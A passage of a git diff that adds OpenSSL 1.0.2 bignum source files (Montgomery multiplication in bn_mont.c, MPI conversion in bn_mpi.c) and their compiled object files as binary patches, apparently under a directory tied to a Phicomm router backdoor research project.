+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * Details about Montgomery multiplication algorithms can be found at
+ * http://security.ece.orst.edu/publications.html, e.g.
+ * http://security.ece.orst.edu/koc/papers/j37acmon.pdf and
+ * sections 3.8 and 4.2 in http://security.ece.orst.edu/koc/papers/r01rsasw.pdf
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+#define MONT_WORD               /* use the faster word-based algorithm */
+
+#ifdef MONT_WORD
+static int BN_from_montgomery_word(BIGNUM *ret, BIGNUM *r, BN_MONT_CTX *mont);
+#endif
+
+int BN_mod_mul_montgomery(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                          BN_MONT_CTX *mont, BN_CTX *ctx)
+{
+    BIGNUM *tmp;
+    int ret = 0;
+#if defined(OPENSSL_BN_ASM_MONT) && defined(MONT_WORD)
+    int num = mont->N.top;
+
+    if (num > 1 && a->top == num && b->top == num) {
+        if (bn_wexpand(r, num) == NULL)
+            return (0);
+        if (bn_mul_mont(r->d, a->d, b->d, mont->N.d, mont->n0, num)) {
+            r->neg = a->neg ^ b->neg;
+            r->top = num;
+            bn_correct_top(r);
+            return (1);
+        }
+    }
+#endif
+
+    BN_CTX_start(ctx);
+    tmp = BN_CTX_get(ctx);
+    if (tmp == NULL)
+        goto err;
+
+    bn_check_top(tmp);
+    if (a == b) {
+        if (!BN_sqr(tmp, a, ctx))
+            goto err;
+    } else {
+        if (!BN_mul(tmp, a, b, ctx))
+            goto err;
+    }
+    /* reduce from aRR to aR */
+#ifdef MONT_WORD
+    if (!BN_from_montgomery_word(r, tmp, mont))
+        goto err;
+#else
+    if (!BN_from_montgomery(r, tmp, mont, ctx))
+        goto err;
+#endif
+    bn_check_top(r);
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    return (ret);
+}
+
+#ifdef MONT_WORD
+static int BN_from_montgomery_word(BIGNUM *ret, BIGNUM *r, BN_MONT_CTX *mont)
+{
+    BIGNUM *n;
+    BN_ULONG *ap, *np, *rp, n0, v, carry;
+    int nl, max, i;
+
+    n = &(mont->N);
+    nl = n->top;
+    if (nl == 0) {
+        ret->top = 0;
+        return (1);
+    }
+
+    max = (2 * nl);             /* carry is stored separately */
+    if (bn_wexpand(r, max) == NULL)
+        return (0);
+
+    r->neg ^= n->neg;
+    np = n->d;
+    rp = r->d;
+
+    /* clear the top words of T */
+# if 1
+    for (i = r->top; i < max; i++) /* memset? XXX */
+        rp[i] = 0;
+# else
+    memset(&(rp[r->top]), 0, (max - r->top) * sizeof(BN_ULONG));
+# endif
+
+    r->top = max;
+    n0 = mont->n0[0];
+
+# ifdef BN_COUNT
+    fprintf(stderr, "word BN_from_montgomery_word %d * %d\n", nl, nl);
+# endif
+    for (carry = 0, i = 0; i < nl; i++, rp++) {
+# ifdef __TANDEM
+        {
+            long long t1;
+            long long t2;
+            long long t3;
+            t1 = rp[0] * (n0 & 0177777);
+            t2 = 037777600000l;
+            t2 = n0 & t2;
+            t3 = rp[0] & 0177777;
+            t2 = (t3 * t2) & BN_MASK2;
+            t1 = t1 + t2;
+            v = bn_mul_add_words(rp, np, nl, (BN_ULONG)t1);
+        }
+# else
+        v = bn_mul_add_words(rp, np, nl, (rp[0] * n0) & BN_MASK2);
+# endif
+        v = (v + carry + rp[nl]) & BN_MASK2;
+        carry |= (v != rp[nl]);
+        carry &= (v <= rp[nl]);
+        rp[nl] = v;
+    }
+
+    if (bn_wexpand(ret, nl) == NULL)
+        return (0);
+    ret->top = nl;
+    ret->neg = r->neg;
+
+    rp = ret->d;
+    ap = &(r->d[nl]);
+
+# define BRANCH_FREE 1
+# if BRANCH_FREE
+    {
+        BN_ULONG *nrp;
+        size_t m;
+
+        v = bn_sub_words(rp, ap, np, nl) - carry;
+        /*
+         * if subtraction result is real, then trick unconditional memcpy
+         * below to perform in-place "refresh" instead of actual copy.
+         */
+        m = (0 - (size_t)v);
+        nrp =
+            (BN_ULONG *)(((PTR_SIZE_INT) rp & ~m) | ((PTR_SIZE_INT) ap & m));
+
+        for (i = 0, nl -= 4; i < nl; i += 4) {
+            BN_ULONG t1, t2, t3, t4;
+
+            t1 = nrp[i + 0];
+            t2 = nrp[i + 1];
+            t3 = nrp[i + 2];
+            ap[i + 0] = 0;
+            t4 = nrp[i + 3];
+            ap[i + 1] = 0;
+            rp[i + 0] = t1;
+            ap[i + 2] = 0;
+            rp[i + 1] = t2;
+            ap[i + 3] = 0;
+            rp[i + 2] = t3;
+            rp[i + 3] = t4;
+        }
+        for (nl += 4; i < nl; i++)
+            rp[i] = nrp[i], ap[i] = 0;
+    }
+# else
+    if (bn_sub_words(rp, ap, np, nl) - carry)
+        memcpy(rp, ap, nl * sizeof(BN_ULONG));
+# endif
+    bn_correct_top(r);
+    bn_correct_top(ret);
+    bn_check_top(ret);
+
+    return (1);
+}
+#endif                          /* MONT_WORD */
+
+int BN_from_montgomery(BIGNUM *ret, const BIGNUM *a, BN_MONT_CTX *mont,
+                       BN_CTX *ctx)
+{
+    int retn = 0;
+#ifdef MONT_WORD
+    BIGNUM *t;
+
+    BN_CTX_start(ctx);
+    if ((t = BN_CTX_get(ctx)) && BN_copy(t, a))
+        retn = BN_from_montgomery_word(ret, t, mont);
+    BN_CTX_end(ctx);
+#else                           /* !MONT_WORD */
+    BIGNUM *t1, *t2;
+
+    BN_CTX_start(ctx);
+    t1 = BN_CTX_get(ctx);
+    t2 = BN_CTX_get(ctx);
+    if (t1 == NULL || t2 == NULL)
+        goto err;
+
+    if (!BN_copy(t1, a))
+        goto err;
+    BN_mask_bits(t1, mont->ri);
+
+    if (!BN_mul(t2, t1, &mont->Ni, ctx))
+        goto err;
+    BN_mask_bits(t2, mont->ri);
+
+    if (!BN_mul(t1, t2, &mont->N, ctx))
+        goto err;
+    if (!BN_add(t2, a, t1))
+        goto err;
+    if (!BN_rshift(ret, t2, mont->ri))
+        goto err;
+
+    if (BN_ucmp(ret, &(mont->N)) >= 0) {
+        if (!BN_usub(ret, ret, &(mont->N)))
+            goto err;
+    }
+    retn = 1;
+    bn_check_top(ret);
+ err:
+    BN_CTX_end(ctx);
+#endif                          /* MONT_WORD */
+    return (retn);
+}
+
+BN_MONT_CTX *BN_MONT_CTX_new(void)
+{
+    BN_MONT_CTX *ret;
+
+    if ((ret = (BN_MONT_CTX *)OPENSSL_malloc(sizeof(BN_MONT_CTX))) == NULL)
+        return (NULL);
+
+    BN_MONT_CTX_init(ret);
+    ret->flags = BN_FLG_MALLOCED;
+    return (ret);
+}
+
+void BN_MONT_CTX_init(BN_MONT_CTX *ctx)
+{
+    ctx->ri = 0;
+    BN_init(&(ctx->RR));
+    BN_init(&(ctx->N));
+    BN_init(&(ctx->Ni));
+    ctx->n0[0] = ctx->n0[1] = 0;
+    ctx->flags = 0;
+}
+
+void BN_MONT_CTX_free(BN_MONT_CTX *mont)
+{
+    if (mont == NULL)
+        return;
+
+    BN_free(&(mont->RR));
+    BN_free(&(mont->N));
+    BN_free(&(mont->Ni));
+    if (mont->flags & BN_FLG_MALLOCED)
+        OPENSSL_free(mont);
+}
+
+int BN_MONT_CTX_set(BN_MONT_CTX *mont, const BIGNUM *mod, BN_CTX *ctx)
+{
+    int ret = 0;
+    BIGNUM *Ri, *R;
+
+    BN_CTX_start(ctx);
+    if ((Ri = BN_CTX_get(ctx)) == NULL)
+        goto err;
+    R = &(mont->RR);            /* grab RR as a temp */
+    if (!BN_copy(&(mont->N), mod))
+        goto err;               /* Set N */
+    mont->N.neg = 0;
+
+#ifdef MONT_WORD
+    {
+        BIGNUM tmod;
+        BN_ULONG buf[2];
+
+        BN_init(&tmod);
+        tmod.d = buf;
+        tmod.dmax = 2;
+        tmod.neg = 0;
+
+        mont->ri = (BN_num_bits(mod) + (BN_BITS2 - 1)) / BN_BITS2 * BN_BITS2;
+
+# if defined(OPENSSL_BN_ASM_MONT) && (BN_BITS2<=32)
+        /*
+         * Only certain BN_BITS2<=32 platforms actually make use of n0[1],
+         * and we could use the #else case (with a shorter R value) for the
+         * others.  However, currently only the assembler files do know which
+         * is which.
+         */
+
+        BN_zero(R);
+        if (!(BN_set_bit(R, 2 * BN_BITS2)))
+            goto err;
+
+        tmod.top = 0;
+        if ((buf[0] = mod->d[0]))
+            tmod.top = 1;
+        if ((buf[1] = mod->top > 1 ? mod->d[1] : 0))
+            tmod.top = 2;
+
+        if ((BN_mod_inverse(Ri, R, &tmod, ctx)) == NULL)
+            goto err;
+        if (!BN_lshift(Ri, Ri, 2 * BN_BITS2))
+            goto err;           /* R*Ri */
+        if (!BN_is_zero(Ri)) {
+            if (!BN_sub_word(Ri, 1))
+                goto err;
+        } else {                /* if N mod word size == 1 */
+
+            if (bn_expand(Ri, (int)sizeof(BN_ULONG) * 2) == NULL)
+                goto err;
+            /* Ri-- (mod double word size) */
+            Ri->neg = 0;
+            Ri->d[0] = BN_MASK2;
+            Ri->d[1] = BN_MASK2;
+            Ri->top = 2;
+        }
+        if (!BN_div(Ri, NULL, Ri, &tmod, ctx))
+            goto err;
+        /*
+         * Ni = (R*Ri-1)/N, keep only couple of least significant words:
+         */
+        mont->n0[0] = (Ri->top > 0) ? Ri->d[0] : 0;
+        mont->n0[1] = (Ri->top > 1) ? Ri->d[1] : 0;
+# else
+        BN_zero(R);
+        if (!(BN_set_bit(R, BN_BITS2)))
+            goto err;           /* R */
+
+        buf[0] = mod->d[0];     /* tmod = N mod word size */
+        buf[1] = 0;
+        tmod.top = buf[0] != 0 ? 1 : 0;
+        /* Ri = R^-1 mod N */
+        if ((BN_mod_inverse(Ri, R, &tmod, ctx)) == NULL)
+            goto err;
+        if (!BN_lshift(Ri, Ri, BN_BITS2))
+            goto err;           /* R*Ri */
+        if (!BN_is_zero(Ri)) {
+            if (!BN_sub_word(Ri, 1))
+                goto err;
+        } else {                /* if N mod word size == 1 */
+
+            if (!BN_set_word(Ri, BN_MASK2))
+                goto err;       /* Ri-- (mod word size) */
+        }
+        if (!BN_div(Ri, NULL, Ri, &tmod, ctx))
+            goto err;
+        /*
+         * Ni = (R*Ri-1)/N, keep only least significant word:
+         */
+        mont->n0[0] = (Ri->top > 0) ? Ri->d[0] : 0;
+        mont->n0[1] = 0;
+# endif
+    }
+#else                           /* !MONT_WORD */
+    {                           /* bignum version */
+        mont->ri = BN_num_bits(&mont->N);
+        BN_zero(R);
+        if (!BN_set_bit(R, mont->ri))
+            goto err;           /* R = 2^ri */
+        /* Ri = R^-1 mod N */
+        if ((BN_mod_inverse(Ri, R, &mont->N, ctx)) == NULL)
+            goto err;
+        if (!BN_lshift(Ri, Ri, mont->ri))
+            goto err;           /* R*Ri */
+        if (!BN_sub_word(Ri, 1))
+            goto err;
+        /*
+         * Ni = (R*Ri-1) / N
+         */
+        if (!BN_div(&(mont->Ni), NULL, Ri, &mont->N, ctx))
+            goto err;
+    }
+#endif
+
+    /* setup RR for conversions */
+    BN_zero(&(mont->RR));
+    if (!BN_set_bit(&(mont->RR), mont->ri * 2))
+        goto err;
+    if (!BN_mod(&(mont->RR), &(mont->RR), &(mont->N), ctx))
+        goto err;
+
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+BN_MONT_CTX *BN_MONT_CTX_copy(BN_MONT_CTX *to, BN_MONT_CTX *from)
+{
+    if (to == from)
+        return (to);
+
+    if (!BN_copy(&(to->RR), &(from->RR)))
+        return NULL;
+    if (!BN_copy(&(to->N), &(from->N)))
+        return NULL;
+    if (!BN_copy(&(to->Ni), &(from->Ni)))
+        return NULL;
+    to->ri = from->ri;
+    to->n0[0] = from->n0[0];
+    to->n0[1] = from->n0[1];
+    return (to);
+}
+
+BN_MONT_CTX *BN_MONT_CTX_set_locked(BN_MONT_CTX **pmont, int lock,
+                                    const BIGNUM *mod, BN_CTX *ctx)
+{
+    BN_MONT_CTX *ret;
+
+    CRYPTO_r_lock(lock);
+    ret = *pmont;
+    CRYPTO_r_unlock(lock);
+    if (ret)
+        return ret;
+
+    /*
+     * We don't want to serialise globally while doing our lazy-init math in
+     * BN_MONT_CTX_set. That punishes threads that are doing independent
+     * things. Instead, punish the case where more than one thread tries to
+     * lazy-init the same 'pmont', by having each do the lazy-init math work
+     * independently and only use the one from the thread that wins the race
+     * (the losers throw away the work they've done).
+     */
+    ret = BN_MONT_CTX_new();
+    if (!ret)
+        return NULL;
+    if (!BN_MONT_CTX_set(ret, mod, ctx)) {
+        BN_MONT_CTX_free(ret);
+        return NULL;
+    }
+
+    /* The locked compare-and-set, after the local work is done. */
+    CRYPTO_w_lock(lock);
+    if (*pmont) {
+        BN_MONT_CTX_free(ret);
+        ret = *pmont;
+    } else
+        *pmont = ret;
+    CRYPTO_w_unlock(lock);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mont.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mont.o
new file mode 100644
index 0000000000000000000000000000000000000000..3caef1f6104bef92d6b0d7e36b6328b0c82d197e
GIT binary patch
literal 6520
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
ZZSmhSWbag?$#26;1!$+)4F6i?{{vQ0!^i*t

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mpi.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mpi.c
new file mode 100644
index 0000000..3bd40bb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mpi.c
@@ -0,0 +1,128 @@
+/* crypto/bn/bn_mpi.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+int BN_bn2mpi(const BIGNUM *a, unsigned char *d)
+{
+    int bits;
+    int num = 0;
+    int ext = 0;
+    long l;
+
+    bits = BN_num_bits(a);
+    num = (bits + 7) / 8;
+    if (bits > 0) {
+        ext = ((bits & 0x07) == 0);
+    }
+    if (d == NULL)
+        return (num + 4 + ext);
+
+    l = num + ext;
+    d[0] = (unsigned char)(l >> 24) & 0xff;
+    d[1] = (unsigned char)(l >> 16) & 0xff;
+    d[2] = (unsigned char)(l >> 8) & 0xff;
+    d[3] = (unsigned char)(l) & 0xff;
+    if (ext)
+        d[4] = 0;
+    num = BN_bn2bin(a, &(d[4 + ext]));
+    if (a->neg)
+        d[4] |= 0x80;
+    return (num + 4 + ext);
+}
+
+BIGNUM *BN_mpi2bn(const unsigned char *d, int n, BIGNUM *a)
+{
+    long len;
+    int neg = 0;
+
+    if (n < 4) {
+        BNerr(BN_F_BN_MPI2BN, BN_R_INVALID_LENGTH);
+        return (NULL);
+    }
+    len = ((long)d[0] << 24) | ((long)d[1] << 16) | ((int)d[2] << 8) | (int)
+        d[3];
+    if ((len + 4) != n) {
+        BNerr(BN_F_BN_MPI2BN, BN_R_ENCODING_ERROR);
+        return (NULL);
+    }
+
+    if (a == NULL)
+        a = BN_new();
+    if (a == NULL)
+        return (NULL);
+
+    if (len == 0) {
+        a->neg = 0;
+        a->top = 0;
+        return (a);
+    }
+    d += 4;
+    if ((*d) & 0x80)
+        neg = 1;
+    if (BN_bin2bn(d, (int)len, a) == NULL)
+        return (NULL);
+    a->neg = neg;
+    if (neg) {
+        BN_clear_bit(a, BN_num_bits(a) - 1);
+    }
+    bn_check_top(a);
+    return (a);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mpi.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mpi.o
new file mode 100644
index 0000000000000000000000000000000000000000..3dfebe3bf9c68ba57726fe2b45626700cd8ec9f1
GIT binary patch
literal 2288
zcmbuAO>7%Q6oALxP2)mXyCq1Gf`|`Q6==J)0|Hth<aNBsrnMR=vD-=|ti0|Po5pKv
zy$cPXHj;6r6*c0(1x_5fHRm2uS1tWHa6#OVP+L_ZQsk;tr6NITcyD&5-8l9Ip7i#;
z`R2WuH-GjyH9Hj!g$S1rd7nIQaZ1R_z;i!E-4uC=43S6C*Zxv+Gv1SYvNNxFkJhkn
zH3A>+N~1ma-JegJx6W=)c9!o9rlQ~eq&0tY_Jr1=H$9=*am4GBB5Ao|*84*%KGs6N
z(`=>j#jY4}#O1@{aw{_+o>)*mxJu_as^pbie!lTkI5(sw+sRv(K8A_b$G+N+>E7Sb
zpS?A$(H6A>51dgypoHbr;B#4k4;_E~l^O3>t@(?)lQw6(Yg)7I4yeg{>$zsf9ae5+
zV15vEBIvBYmx->P7PZ#rQ0iUpzUtjqu5`v|I^;UnRBv%tO#Sll(#x<Eiov#O8`M3K
z^=`uwlm+F(t7Lj|@?d;CZ@8A@#t+DE%87l+cU;;`o}Ea@iML+&G0qDjf?_ea{nJPC
zBuq#f8LkFp*f%8f*&GR-iG@ao1|#3V0geNImGza-PD!x~;fyqLUYL~P4KaL78d0QJ
zT8a?zE_7=w_6CdnI-Hh9T0&ZiUl0{({QQ6-B^ukpE7EvIibGeL<+8Lb2Jeta9&T*u
z03h_dVaWNaHfITR7dA6&31r(=NcmtN4vXy}0^Qxs9WOw0XP{2Hhrn>Z>E+lQPTuIl
